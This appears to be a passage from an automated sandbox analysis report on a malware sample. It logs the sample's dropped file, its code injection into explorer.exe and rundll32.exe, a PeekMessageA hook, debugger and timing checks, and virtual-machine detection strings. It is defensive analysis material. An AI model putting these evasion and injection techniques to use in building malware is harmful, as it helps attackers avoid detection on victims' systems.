          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_004176AF pushfd ; ret 4_2_004176BE
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_00416FDA push FFFFFFA3h; ret 4_2_00416FF2
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_00416FE0 push FFFFFFA3h; ret 4_2_00416FF2
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015C09AD push ecx; mov dword ptr [esp], ecx4_2_015C09B6
          Source: C:\Windows\explorer.exeCode function: 5_2_10B529B5 push esp; retn 0000h5_2_10B52AE7
          Source: C:\Windows\explorer.exeCode function: 5_2_10B52B1E push esp; retn 0000h5_2_10B52B1F
          Source: C:\Windows\explorer.exeCode function: 5_2_10B52B02 push esp; retn 0000h5_2_10B52B03
          Source: C:\Windows\explorer.exeCode function: 5_2_111E99B5 push esp; retn 0000h5_2_111E9AE7
          Source: C:\Windows\explorer.exeCode function: 5_2_111E9B1E push esp; retn 0000h5_2_111E9B1F
          Source: C:\Windows\explorer.exeCode function: 5_2_111E9B02 push esp; retn 0000h5_2_111E9B03
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_043F09AD push ecx; mov dword ptr [esp], ecx6_2_043F09B6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00136839 push edi; retf 6_2_0013683B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0013EA4F push edx; ret 6_2_0013EA51
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0013EABD pushfd ; retn 0000h6_2_0013EAC7
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00136FDA push FFFFFFA3h; ret 6_2_00136FF2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00136FE0 push FFFFFFA3h; ret 6_2_00136FF2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0013D4A5 push eax; ret 6_2_0013D4F8
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 2_2_001A2015 std::exception::exception,_wmemset,std::locale::_Getfacet,ctype,messages,std::system_error::system_error,LoadLibraryA,GetProcAddress,GetConsoleWindow,ShowWindow,VirtualAlloc,EnumSystemCodePagesW,2_2_001A2015
          Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exeFile created: C:\Users\user\AppData\Local\Temp\xheuzyg.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x83 0x3E 0xE8
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 2_2_001AFA47 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_001AFA47
          Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_2-18201
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeRDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 0000000000129904 second address: 000000000012990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 0000000000129B6E second address: 0000000000129B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_5-13952
          Source: C:\Windows\explorer.exe TID: 1660Thread sleep count: 1944 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 1660Thread sleep time: -3888000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 1660Thread sleep count: 7997 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 1660Thread sleep time: -15994000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exe TID: 2696Thread sleep count: 2275 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exe TID: 2696Thread sleep time: -4550000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exe TID: 2696Thread sleep count: 7690 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exe TID: 2696Thread sleep time: -15380000s >= -30000sJump to behavior
          Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe TID: 1144Thread sleep count: 95 > 30Jump to behavior
          Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe TID: 1144Thread sleep count: 88 > 30Jump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_00409AA0 rdtsc 4_2_00409AA0
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1944Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 7997Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 872Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 880Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 2275Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 7690Jump to behavior
          Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exeMemory allocated: 16DDDC00000 memory reserve | memory write watchJump to behavior
          Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exeMemory allocated: 16DF5C00000 memory reserve | memory write watchJump to behavior
          Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exeMemory allocated: 16DDD9D0000 memory reserve | memory write watchJump to behavior
          Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exeMemory allocated: 16DF5F80000 memory reserve | memory write watchJump to behavior
          Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exeMemory allocated: 175FB5F0000 memory reserve | memory write watchJump to behavior
          Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exeMemory allocated: 175FD0F0000 memory reserve | memory write watchJump to behavior
          Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exeMemory allocated: 175FD3F0000 memory reserve | memory write watchJump to behavior
          Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exeMemory allocated: 175FD410000 memory reserve | memory write watchJump to behavior
          Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exeMemory allocated: 175FD420000 memory reserve | memory write watchJump to behavior
          Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exeMemory allocated: 175FD430000 memory reserve | memory write watchJump to behavior
          Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exeMemory allocated: 175FD440000 memory reserve | memory write watchJump to behavior
          Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exeMemory allocated: 175FD450000 memory reserve | memory write watchJump to behavior
          Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exeMemory allocated: 175FD460000 memory reserve | memory write watchJump to behavior
          Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exeMemory allocated: 175FD470000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeAPI coverage: 1.4 %
          Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 2.1 %
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 2_2_013807DA GetSystemInfo,2_2_013807DA
          Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exeCode function: 0_2_00405EC2 FindFirstFileA,FindClose,0_2_00405EC2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exeCode function: 0_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004054EC
          Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exeCode function: 0_2_00402671 FindFirstFileA,0_2_00402671
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 2_2_001C16A5 FindFirstFileExW,2_2_001C16A5
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_001C16A5 FindFirstFileExW,4_2_001C16A5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exeAPI call chain: ExitProcess graph end nodegraph_0-3203
          Source: explorer.exe, 00000005.00000000.1240160729.000000000C3F7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Prod_VMware_SATA
          Source: explorer.exe, 00000005.00000000.1233732811.0000000000C74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000I
          Source: explorer.exe, 00000005.00000000.1234249751.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
          Source: explorer.exe, 00000005.00000002.3725032984.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: rundll32.exe, 00000006.00000002.3699669578.0000000000486000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
          Source: explorer.exe, 00000005.00000003.3204464186.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2274294266.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3725032984.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1237220182.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3077516226.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3196363751.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3699669578.00000000004DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000005.00000000.1234249751.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9dVMware20,1
          Source: explorer.exe, 00000005.00000003.2274294266.0000000009013000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000005.00000000.1234249751.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/2022
          Source: explorer.exe, 00000005.00000000.1234249751.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
          Source: explorer.exe, 00000005.00000002.3719591837.0000000007315000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_xU1
          Source: explorer.exe, 00000005.00000002.3725032984.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
          Source: explorer.exe, 00000005.00000003.3196363751.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000I}~"
          Source: explorer.exe, 00000005.00000002.3728348444.0000000009052000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000}io
          Source: explorer.exe, 00000005.00000003.3196363751.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000005.00000003.2274294266.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3077516226.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1237220182.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3204464186.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3196363751.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3725032984.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en-US\machine.inf_loc5
          Source: explorer.exe, 00000005.00000000.1234249751.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware20,1
          Source: explorer.exe, 00000005.00000000.1234249751.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
          Source: explorer.exe, 00000005.00000002.3725032984.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMWare
          Source: explorer.exe, 00000005.00000002.3728348444.0000000009052000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000'
          Source: explorer.exe, 00000005.00000002.3719591837.0000000007315000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
          Source: explorer.exe, 00000005.00000003.3196363751.0000000008F27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2274294266.0000000008F27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3077516226.0000000008F27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3204464186.0000000008F27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1237220182.0000000008F27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3725032984.0000000008F27000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWT`
          Source: explorer.exe, 00000005.00000000.1234249751.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIES1371
          Source: explorer.exe, 00000005.00000000.1234249751.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM
          Source: rundll32.exe, 00000006.00000002.3699669578.00000000004D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW}
          Source: explorer.exe, 00000005.00000000.1234249751.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
          Source: explorer.exe, 00000005.00000000.1233732811.0000000000C74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000005.00000002.3725032984.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.1233732811.0000000000C74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 2_2_001B0828 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_001B0828
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 2_2_001A2015 std::exception::exception,_wmemset,std::locale::_Getfacet,ctype,messages,std::system_error::system_error,LoadLibraryA,GetProcAddress,GetConsoleWindow,ShowWindow,VirtualAlloc,EnumSystemCodePagesW,2_2_001A2015
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 2_2_001BE682 GetProcessHeap,2_2_001BE682
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_00409AA0 rdtsc 4_2_00409AA0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 2_2_0138013E mov eax, dword ptr fs:[00000030h]2_2_0138013E
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 2_2_01380109 mov eax, dword ptr fs:[00000030h]2_2_01380109
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 2_2_0138017B mov eax, dword ptr fs:[00000030h]2_2_0138017B
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 2_2_0138005F mov eax, dword ptr fs:[00000030h]2_2_0138005F
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015C6154 mov eax, dword ptr fs:[00000030h]4_2_015C6154
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015C6154 mov eax, dword ptr fs:[00000030h]4_2_015C6154
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015BC156 mov eax, dword ptr fs:[00000030h]4_2_015BC156
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01694164 mov eax, dword ptr fs:[00000030h]4_2_01694164
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01694164 mov eax, dword ptr fs:[00000030h]4_2_01694164
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01654144 mov eax, dword ptr fs:[00000030h]4_2_01654144
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01654144 mov eax, dword ptr fs:[00000030h]4_2_01654144
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01654144 mov ecx, dword ptr fs:[00000030h]4_2_01654144
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01654144 mov eax, dword ptr fs:[00000030h]4_2_01654144
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01654144 mov eax, dword ptr fs:[00000030h]4_2_01654144
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01658158 mov eax, dword ptr fs:[00000030h]4_2_01658158
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0166E10E mov eax, dword ptr fs:[00000030h]4_2_0166E10E
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0166E10E mov ecx, dword ptr fs:[00000030h]4_2_0166E10E
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0166E10E mov eax, dword ptr fs:[00000030h]4_2_0166E10E
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0166E10E mov eax, dword ptr fs:[00000030h]4_2_0166E10E
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0166E10E mov ecx, dword ptr fs:[00000030h]4_2_0166E10E
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0166E10E mov eax, dword ptr fs:[00000030h]4_2_0166E10E
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0166E10E mov eax, dword ptr fs:[00000030h]4_2_0166E10E
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0166E10E mov ecx, dword ptr fs:[00000030h]4_2_0166E10E
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0166E10E mov eax, dword ptr fs:[00000030h]4_2_0166E10E
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0166E10E mov ecx, dword ptr fs:[00000030h]4_2_0166E10E
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015F0124 mov eax, dword ptr fs:[00000030h]4_2_015F0124
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01680115 mov eax, dword ptr fs:[00000030h]4_2_01680115
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0166A118 mov ecx, dword ptr fs:[00000030h]4_2_0166A118
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0166A118 mov eax, dword ptr fs:[00000030h]4_2_0166A118
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0166A118 mov eax, dword ptr fs:[00000030h]4_2_0166A118
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0166A118 mov eax, dword ptr fs:[00000030h]4_2_0166A118
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_016961E5 mov eax, dword ptr fs:[00000030h]4_2_016961E5
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015F01F8 mov eax, dword ptr fs:[00000030h]4_2_015F01F8
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_016861C3 mov eax, dword ptr fs:[00000030h]4_2_016861C3
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_016861C3 mov eax, dword ptr fs:[00000030h]4_2_016861C3
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0163E1D0 mov eax, dword ptr fs:[00000030h]4_2_0163E1D0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0163E1D0 mov eax, dword ptr fs:[00000030h]4_2_0163E1D0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0163E1D0 mov ecx, dword ptr fs:[00000030h]4_2_0163E1D0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0163E1D0 mov eax, dword ptr fs:[00000030h]4_2_0163E1D0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0163E1D0 mov eax, dword ptr fs:[00000030h]4_2_0163E1D0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015BA197 mov eax, dword ptr fs:[00000030h]4_2_015BA197
